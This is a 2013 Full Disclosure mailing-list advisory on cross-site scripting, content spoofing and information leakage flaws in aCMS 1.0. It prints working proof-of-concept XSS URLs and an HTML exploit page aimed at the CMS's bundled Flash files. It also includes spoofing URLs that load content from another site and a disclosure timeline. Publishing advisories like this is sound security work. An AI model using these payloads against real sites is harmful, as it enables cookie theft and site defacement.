Full Disclosure mailing list archives
Multiple vulnerabilities in aCMS
From: "MustLive" <mustlive () websecurity com ua>
Date: Sat, 25 May 2013 23:41:14 +0300
Hello list!These are Cross-Site Scripting, Content Spoofing and Information Leakage vulnerabilities in aCMS. This is commercial CMS. There are multiple vulnerabilities in aCMS and it's the first part of them.
------------------------- Affected products: ------------------------- Vulnerable are aCMS 1.0 and previous versions. ------------------------- Affected vendors: ------------------------- Almacor http://almacor.ru ---------- Details: ---------- Cross-Site Scripting (WASC-08):For ZeroClipboard10.swf XSS via id parameter and XSS via copying payload into clipboard are possible.
http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E Content Spoofing (WASC-12):Swf-file accepts arbitrary addresses in parameter flvToPlay and startImage, which allows to spoof content of flash - i.e. by setting addresses of video and/or image files from other site.
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xmlSwf-file accepts arbitrary addresses in parameter flvToPlay, which allows to spoof content of flash - i.e. by setting address of playlist file from other site (parameters thumbnail and url in xml-file accept arbitrary addresses).
File 1.xml: <?xml version="1.0" encoding="UTF-8"?> <playlist> <item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/> <item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/> </playlist> Cross-Site Scripting (WASC-08):If at the site at page with flv_player.swf (with parameter jsCallback=true, or if there is possibility to set this parameter for flv_player.swf) there is possibility to include JS code with function flvStart() and/or flvEnd() (via HTML Injection), then it's possible to conduct XSS attack. I.e. JS-callbacks can be used for XSS attack.
Example of exploit: <html> <body> <script> function flvStart() { alert('XSS'); } function flvEnd() { alert('XSS'); } </script> <object width="50%" height="50%"> <param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true"> <param name=quality value=high><embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object> </body> </html> Information Leakage (WASC-13): http://site/assets/1At error 404 page there are Source Code Disclosure, Full Path Disclosure and showing list of the files and other information.
------------ Timeline:------------
2013.03.04 - informed developers about part of the vulnerabilities. 2013.04.03 - informed developers about another part of the vulnerabilities. 2013.04.05 - announced at my site. 2013.04.07 - informed developers about another part of the vulnerabilities.2013.05.25 - informed developers about another part of the vulnerabilities. In all cases the developers just ignored all messages via different e-mails and contact form.
2013.05.25 - disclosed at my site (http://websecurity.com.ua/6423/). Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Multiple vulnerabilities in aCMS MustLive (May 25)